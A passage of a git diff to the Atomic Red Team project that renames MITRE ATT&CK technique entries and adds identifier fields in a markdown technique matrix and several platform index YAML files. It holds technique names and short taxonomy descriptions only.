-| [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Active Setup](../../T1547.014/T1547.014.md) | Rootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Service Discovery](../../T1007/T1007.md) | [Use Alternate Authentication Material: Pass the Ticket](../../T1550.003/T1550.003.md) | [Data Staged: Local Data Staging](../../T1074.001/T1074.001.md) | [Exfiltration Over C2 Channel](../../T1041/T1041.md) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | [Command and Scripting Interpreter](../../T1059/T1059.md) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Active Setup](../../T1547.014/T1547.014.md) | Rootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Service Discovery](../../T1007/T1007.md) | [Use Alternate Authentication Material: Pass the Ticket](../../T1550.003/T1550.003.md) | [Data Staged: Local Data Staging](../../T1074.001/T1074.001.md) | [Exfiltration Over C2 Channel](../../T1041/T1041.md) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | Domain Trust Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Double File Extension [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Sniffing](../../T1040/T1040.md) | [Network Sniffing](../../T1040/T1040.md) | [Software Deployment Tools](../../T1072/T1072.md) | [Email Collection: Local Email Collection](../../T1114.001/T1114.001.md) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | [Protocol Tunneling](../../T1572/T1572.md) | Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Deployment Tools](../../T1072/T1072.md) | [Active Setup](../../T1547.014/T1547.014.md) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | [Abuse Elevation Control Mechanism: Bypass User Account Control](../../T1548.002/T1548.002.md) | [Unsecured Credentials: Credentials in Registry](../../T1552.002/T1552.002.md) | [Network Share Discovery](../../T1135/T1135.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Automated Collection](../../T1119/T1119.md) | Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: PowerShell](../../T1059.001/T1059.001.md) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | [Boot or Logon Autostart Execution: Print Processors](../../T1547.012/T1547.012.md) | System Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | [Peripheral Device Discovery](../../T1120/T1120.md) | Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Clipboard Data](../../T1115/T1115.md) | [Exfiltration Over Web Service: Exfiltration to Text Storage Sites](../../T1567.003/T1567.003.md) | Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: PowerShell](../../T1059.001/T1059.001.md) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | [Boot or Logon Autostart Execution: Print Processors](../../T1547.012/T1547.012.md) | [Pre-OS Boot: System Firmware](../../T1542.001/T1542.001.md) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | [Peripheral Device Discovery](../../T1120/T1120.md) | Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Clipboard Data](../../T1115/T1115.md) | [Exfiltration Over Web Service: Exfiltration to Text Storage Sites](../../T1567.003/T1567.003.md) | Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Spearphishing Voice [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Inter-Process Communication](../../T1559/T1559.md) | [Office Application Startup](../../T1137/T1137.md) | [Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Steal or Forge Kerberos Tickets: AS-REP Roasting](../../T1558.004/T1558.004.md) | [System Information Discovery](../../T1082/T1082.md) | [Lateral Tool Transfer](../../T1570/T1570.md) | Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Web Service: Exfiltration to Cloud Storage](../../T1567.002/T1567.002.md) | External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Financial Theft [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Print Processors](../../T1547.012/T1547.012.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Wi-Fi Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote Service Session Hijacking: RDP Hijacking](../../T1563.002/T1563.002.md) | [Data from Local System](../../T1005/T1005.md) | Data Transfer Size Limits [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Defacement: Internal Defacement](../../T1491.001/T1491.001.md) |
+| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Print Processors](../../T1547.012/T1547.012.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Wi-Fi Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote Service Session Hijacking: RDP Hijacking](../../T1563.002/T1563.002.md) | [Data from Local System](../../T1005/T1005.md) | [Data Transfer Size Limits](../../T1030/T1030.md) | Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Defacement: Internal Defacement](../../T1491.001/T1491.001.md) |
 | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Command and Scripting Interpreter: Python [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [Thread Execution Hijacking](../../T1055.003/T1055.003.md) | Mavinject [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Credentials from Password Stores](../../T1555/T1555.md) | [Application Window Discovery](../../T1010/T1010.md) | [Use Alternate Authentication Material: Pass the Hash](../../T1550.002/T1550.002.md) | Archive Collected Data: Archive via Library [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Office Application Startup: Add-ins](../../T1137.006/T1137.006.md) | [Event Triggered Execution: Application Shimming](../../T1546.011/T1546.011.md) | [Masquerading: Match Legitimate Name or Location](../../T1036.005/T1036.005.md) | Unsecured Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Email Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote Services: Remote Desktop Protocol](../../T1021.001/T1021.001.md) | [Archive Collected Data](../../T1560/T1560.md) | [Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Access Removal](../../T1531/T1531.md) |
 | Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: Windows Command Shell](../../T1059.003/T1059.003.md) | [Server Software Component: Transport Agent](../../T1505.002/T1505.002.md) | [Boot or Logon Autostart Execution: Port Monitors](../../T1547.010/T1547.010.md) | Masquerade File Type [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Browser Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | DNS Calculation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) |
@@ -36,12 +36,12 @@
 |  |  | [Time Providers](../../T1547.003/T1547.003.md) | [Event Triggered Execution: Accessibility Features](../../T1546.008/T1546.008.md) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Location Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  | Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
 |  |  | [Create Account: Local Account](../../T1136.001/T1136.001.md) | [Process Injection: Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | [Impair Defenses](../../T1562/T1562.md) | Multi-Factor Authentication Request Generation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Discovery: Security Software Discovery](../../T1518.001/T1518.001.md) |  |  |  | [Application Layer Protocol: Web Protocols](../../T1071.001/T1071.001.md) |  |
 |  |  | [Boot or Logon Autostart Execution: Winlogon Helper DLL](../../T1547.004/T1547.004.md) | [Event Triggered Execution: AppCert DLLs](../../T1546.009/T1546.009.md) | [Thread Execution Hijacking](../../T1055.003/T1055.003.md) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote System Discovery](../../T1018/T1018.md) |  |  |  | [Ingress Tool Transfer](../../T1105/T1105.md) |  |
-|  |  | [Event Triggered Execution: Image File Execution Options Injection](../../T1546.012/T1546.012.md) | Device Registration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Masquerading](../../T1036/T1036.md) | [Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md) | [Network Service Discovery](../../T1046/T1046.md) |  |  |  | Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
+|  |  | [Event Triggered Execution: Image File Execution Options Injection](../../T1546.012/T1546.012.md) | Device Registration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Masquerading](../../T1036/T1036.md) | [Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md) | [Network Service Discovery](../../T1046/T1046.md) |  |  |  | [Data Obfuscation via Steganography](../../T1001.002/T1001.002.md) |  |
 |  |  | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Process Injection: Portable Executable Injection](../../T1055.002/T1055.002.md) | [Email Collection: Mailbox Manipulation](../../T1070.008/T1070.008.md) | Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Discovery](../../T1518/T1518.md) |  |  |  | Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
 |  |  | [Event Triggered Execution: Accessibility Features](../../T1546.008/T1546.008.md) | [Access Token Manipulation: Token Impersonation/Theft](../../T1134.001/T1134.001.md) | [Process Injection](../../T1055/T1055.md) | [Brute Force: Credential Stuffing](../../T1110.004/T1110.004.md) | Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  | [Proxy: Internal Proxy](../../T1090.001/T1090.001.md) |  |
 |  |  | [Create Account: Domain Account](../../T1136.002/T1136.002.md) | Make and Impersonate Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Time Discovery](../../T1124/T1124.md) |  |  |  | Dead Drop Resolver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
 |  |  | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) | [Signed Binary Proxy Execution](../../T1218/T1218.md) | [Forced Authentication](../../T1187/T1187.md) |  |  |  |  | Junk Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
-|  |  | Office Template Macros [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Access Token Manipulation: Parent PID Spoofing](../../T1134.004/T1134.004.md) | [Indicator Removal on Host: Timestomp](../../T1070.006/T1070.006.md) | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |
+|  |  | [Office Application Startup: Office Template Macros.](../../T1137.001/T1137.001.md) | [Access Token Manipulation: Parent PID Spoofing](../../T1134.004/T1134.004.md) | [Indicator Removal on Host: Timestomp](../../T1070.006/T1070.006.md) | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |
 |  |  | [Event Triggered Execution: AppCert DLLs](../../T1546.009/T1546.009.md) | [Event Triggered Execution: Change Default File Association](../../T1546.001/T1546.001.md) | [Reflective Code Loading](../../T1620/T1620.md) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |
 |  |  | Device Registration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Ignore Process Interrupts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Steal or Forge Kerberos Tickets: Silver Ticket](../../T1558.002/T1558.002.md) |  |  |  |  |  |  |
 |  |  | Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Credentials from Password Stores: Windows Credential Manager](../../T1555.004/T1555.004.md) |  |  |  |  |  |  |
@@ -86,7 +86,7 @@
 |  |  | SQL Stored Procedures [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | LNK Icon Smuggling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  | [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) |  | [Hide Artifacts: Hidden Users](../../T1564.002/T1564.002.md) |  |  |  |  |  |  |  |
 |  |  | [Hijack Execution Flow: COR_PROFILER](../../T1574.012/T1574.012.md) |  | Make and Impersonate Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
-|  |  |  |  | Impair Defenses: HISTCONTROL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
+|  |  |  |  | [Impair Defenses: Impair Command History Logging](../../T1562.003/T1562.003.md) |  |  |  |  |  |  |  |
 |  |  |  |  | Network Provider DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | [Access Token Manipulation: Parent PID Spoofing](../../T1134.004/T1134.004.md) |  |  |  |  |  |  |  |
diff --git a/atomics/Indexes/azure-ad-index.yaml b/atomics/Indexes/azure-ad-index.yaml
index d19354c6..e5638b1b 100644
--- a/atomics/Indexes/azure-ad-index.yaml
+++ b/atomics/Indexes/azure-ad-index.yaml
@@ -1264,7 +1264,7 @@ defense-evasion:
   T1542.001:
     technique:
       modified: '2023-03-30T21:01:49.493Z'
-      name: System Firmware
+      name: 'Pre-OS Boot: System Firmware'
       description: |-
         Adversaries may modify system firmware to persist on systems.The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer. (Citation: Wikipedia BIOS) (Citation: Wikipedia UEFI) (Citation: About UEFI)
 
@@ -1339,6 +1339,7 @@ defense-evasion:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
+      identifier: T1542.001
     atomic_tests: []
   T1574.011:
     technique:
@@ -8017,7 +8018,7 @@ defense-evasion:
   T1562.003:
     technique:
       modified: '2023-03-30T21:01:47.940Z'
-      name: 'Impair Defenses: HISTCONTROL'
+      name: 'Impair Defenses: Impair Command History Logging'
       description: "Adversaries may impair command history logging to hide commands
         they run on a compromised system. Various command interpreters keep track
         of the commands users type in their terminal so that users can retrace what
@@ -24527,6 +24528,7 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1059
     atomic_tests: []
   T1609:
     technique:
@@ -26704,7 +26706,7 @@ persistence:
   T1542.001:
     technique:
       modified: '2023-03-30T21:01:49.493Z'
-      name: System Firmware
+      name: 'Pre-OS Boot: System Firmware'
       description: |-
         Adversaries may modify system firmware to persist on systems.The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer. (Citation: Wikipedia BIOS) (Citation: Wikipedia UEFI) (Citation: About UEFI)
 
@@ -26779,6 +26781,7 @@ persistence:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
+      identifier: T1542.001
     atomic_tests: []
   T1574.011:
     technique:
@@ -30176,7 +30179,7 @@ persistence:
         description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
           Retrieved February 5, 2019.
       modified: '2021-08-16T21:27:10.873Z'
-      name: Office Template Macros
+      name: 'Office Application Startup: Office Template Macros.'
       description: "Adversaries may abuse Microsoft Office templates to obtain persistence
         on a compromised system. Microsoft Office contains templates that are part
         of common Office applications and are used to customize styles. The base templates
@@ -30228,6 +30231,7 @@ persistence:
       x_mitre_permissions_required:
       - User
       - Administrator
+      identifier: T1137.001
     atomic_tests: []
   T1546.009:
     technique:
@@ -35900,6 +35904,7 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1071
     atomic_tests: []
   T1219:
     technique:
@@ -37510,7 +37515,7 @@ command-and-control:
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
       modified: '2020-03-15T00:37:58.963Z'
-      name: Steganography
+      name: Data Obfuscation via Steganography
       description: 'Adversaries may use steganographic techniques to hide command
         and control traffic to make detection efforts more difficult. Steganographic
         techniques can be used to hide data in digital messages that are transferred
@@ -37532,6 +37537,7 @@ command-and-control:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
+      identifier: T1001.002
     atomic_tests: []
   T1008:
     technique:
diff --git a/atomics/Indexes/containers-index.yaml b/atomics/Indexes/containers-index.yaml
index c1b78023..eea7115a 100644
--- a/atomics/Indexes/containers-index.yaml
+++ b/atomics/Indexes/containers-index.yaml
@@ -1264,7 +1264,7 @@ defense-evasion:
   T1542.001:
     technique:
       modified: '2023-03-30T21:01:49.493Z'
-      name: System Firmware
+      name: 'Pre-OS Boot: System Firmware'
       description: |-
         Adversaries may modify system firmware to persist on systems.The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer. (Citation: Wikipedia BIOS) (Citation: Wikipedia UEFI) (Citation: About UEFI)
 
@@ -1339,6 +1339,7 @@ defense-evasion:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
+      identifier: T1542.001
     atomic_tests: []
   T1574.011:
     technique:
@@ -7992,7 +7993,7 @@ defense-evasion:
   T1562.003:
     technique:
       modified: '2023-03-30T21:01:47.940Z'
-      name: 'Impair Defenses: HISTCONTROL'
+      name: 'Impair Defenses: Impair Command History Logging'
       description: "Adversaries may impair command history logging to hide commands
         they run on a compromised system. Various command interpreters keep track
         of the commands users type in their terminal so that users can retrace what
@@ -24243,6 +24244,7 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1059
     atomic_tests: []
   T1609:
     technique:
@@ -26567,7 +26569,7 @@ persistence:
   T1542.001:
     technique:
       modified: '2023-03-30T21:01:49.493Z'
-      name: System Firmware
+      name: 'Pre-OS Boot: System Firmware'
       description: |-
         Adversaries may modify system firmware to persist on systems.The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer. (Citation: Wikipedia BIOS) (Citation: Wikipedia UEFI) (Citation: About UEFI)
 
@@ -26642,6 +26644,7 @@ persistence:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
+      identifier: T1542.001
     atomic_tests: []
   T1574.011:
     technique:
@@ -29916,7 +29919,7 @@ persistence:
         description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
           Retrieved February 5, 2019.
       modified: '2021-08-16T21:27:10.873Z'
-      name: Office Template Macros
+      name: 'Office Application Startup: Office Template Macros.'
       description: "Adversaries may abuse Microsoft Office templates to obtain persistence
         on a compromised system. Microsoft Office contains templates that are part
         of common Office applications and are used to customize styles. The base templates
@@ -29968,6 +29971,7 @@ persistence:
       x_mitre_permissions_required:
       - User
       - Administrator
+      identifier: T1137.001
     atomic_tests: []
   T1546.009:
     technique:
@@ -35175,6 +35179,7 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1071
     atomic_tests: []
   T1219:
     technique:
@@ -36785,7 +36790,7 @@ command-and-control:
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
       modified: '2020-03-15T00:37:58.963Z'
-      name: Steganography
+      name: Data Obfuscation via Steganography
       description: 'Adversaries may use steganographic techniques to hide command
         and control traffic to make detection efforts more difficult. Steganographic
         techniques can be used to hide data in digital messages that are transferred
@@ -36807,6 +36812,7 @@ command-and-control:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
+      identifier: T1001.002
     atomic_tests: []
   T1008:
     technique:
diff --git a/atomics/Indexes/google-workspace-index.yaml b/atomics/Indexes/google-workspace-index.yaml
index 22be6495..c7d52890 100644
--- a/atomics/Indexes/google-workspace-index.yaml
+++ b/atomics/Indexes/google-workspace-index.yaml
@@ -1264,7 +1264,7 @@ defense-evasion:
   T1542.001:
     technique:
       modified: '2023-03-30T21:01:49.493Z'
-      name: System Firmware
+      name: 'Pre-OS Boot: System Firmware'
       description: |-
         Adversaries may modify system firmware to persist on systems.The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer. (Citation: Wikipedia BIOS) (Citation: Wikipedia UEFI) (Citation: About UEFI)
 
@@ -1339,6 +1339,7 @@ defense-evasion:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
+      identifier: T1542.001
     atomic_tests: []
   T1574.011:
     technique:
@@ -7921,7 +7922,7 @@ defense-evasion:
   T1562.003:
     technique:
       modified: '2023-03-30T21:01:47.940Z'
-      name: 'Impair Defenses: HISTCONTROL'
+      name: 'Impair Defenses: Impair Command History Logging'
       description: "Adversaries may impair command history logging to hide commands
         they run on a compromised system. Various command interpreters keep track
         of the commands users type in their terminal so that users can retrace what
@@ -23952,6 +23953,7 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1059
     atomic_tests: []
   T1609:
     technique:
@@ -26129,7 +26131,7 @@ persistence:
   T1542.001:
     technique:
       modified: '2023-03-30T21:01:49.493Z'
-      name: System Firmware
+      name: 'Pre-OS Boot: System Firmware'
       description: |-
